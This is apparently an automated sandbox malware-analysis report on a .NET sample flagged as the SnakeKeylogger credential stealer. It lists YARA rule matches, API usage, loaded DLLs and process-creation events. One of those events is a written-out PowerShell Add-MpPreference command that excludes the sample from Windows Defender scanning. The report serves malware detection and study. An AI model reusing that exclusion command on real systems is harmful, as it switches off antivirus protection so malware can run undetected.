Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Code function: 0_2_052D91B0	0_2_052D91B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Code function: 0_2_052DFB40	0_2_052DFB40
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Code function: 0_2_07836F10	0_2_07836F10
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Code function: 0_2_07830478	0_2_07830478
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Code function: 0_2_07831C78	0_2_07831C78
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Code function: 0_2_078320A0	0_2_078320A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Code function: 0_2_078320B0	0_2_078320B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Code function: 0_2_07830040	0_2_07830040
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Code function: 4_2_00ECA088	4_2_00ECA088
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Code function: 4_2_00ECC19C	4_2_00ECC19C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Code function: 4_2_00ECD278	4_2_00ECD278
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Code function: 4_2_00EC5362	4_2_00EC5362
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Code function: 4_2_00ECC468	4_2_00ECC468
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Code function: 4_2_00ECC738	4_2_00ECC738
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Code function: 4_2_00EC69A0	4_2_00EC69A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Code function: 4_2_00ECE988	4_2_00ECE988
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Code function: 4_2_00ECCA08	4_2_00ECCA08
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Code function: 4_2_00ECCCD8	4_2_00ECCCD8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Code function: 4_2_00EC6FC8	4_2_00EC6FC8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Code function: 4_2_00ECCFAA	4_2_00ECCFAA
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Code function: 4_2_00ECF630	4_2_00ECF630
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Code function: 4_2_00ECE97A	4_2_00ECE97A
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Code function: 4_2_00ECFA88	4_2_00ECFA88
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Code function: 4_2_00EC3E09	4_2_00EC3E09

Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1743556585.00000000077A0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1737431170.0000000002D68000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1736065029.0000000000F3E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1738966608.0000000003D19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1738966608.0000000003D19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1737431170.0000000002D11000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4169573077.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4169824289.0000000000CF7000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Binary or memory string: OriginalFilenameDtrB.exe0 vs SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe

Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 4.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3f42e50.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3f42e50.5.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3f42e50.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3da9138.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3da9138.6.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3da9138.6.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3f42e50.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3f42e50.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3da9138.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3da9138.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000004.00000002.4169573077.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1738966608.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe PID: 7252, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe PID: 7472, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3da9138.6.raw.unpack, COVID19.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3da9138.6.raw.unpack, VIPSeassion.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3da9138.6.raw.unpack, VIPSeassion.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3f42e50.5.raw.unpack, COVID19.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3f42e50.5.raw.unpack, VIPSeassion.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3f42e50.5.raw.unpack, VIPSeassion.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.77a0000.8.raw.unpack, Uel8r1lQF2PkteGZrv.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.77a0000.8.raw.unpack, Uel8r1lQF2PkteGZrv.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3fc7870.4.raw.unpack, Uel8r1lQF2PkteGZrv.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3fc7870.4.raw.unpack, Uel8r1lQF2PkteGZrv.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.77a0000.8.raw.unpack, E0RYX9X2eibsstJT2l.cs	Security API names: _0020.SetAccessControl
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.77a0000.8.raw.unpack, E0RYX9X2eibsstJT2l.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.77a0000.8.raw.unpack, E0RYX9X2eibsstJT2l.cs	Security API names: _0020.AddAccessRule
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3fc7870.4.raw.unpack, E0RYX9X2eibsstJT2l.cs	Security API names: _0020.SetAccessControl
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3fc7870.4.raw.unpack, E0RYX9X2eibsstJT2l.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3fc7870.4.raw.unpack, E0RYX9X2eibsstJT2l.cs	Security API names: _0020.AddAccessRule

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/6@3/3

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7464:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bpzdcvwv.4oj.ps1

Jump to behavior

Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe

ReversingLabs: Detection: 28%

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe"	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
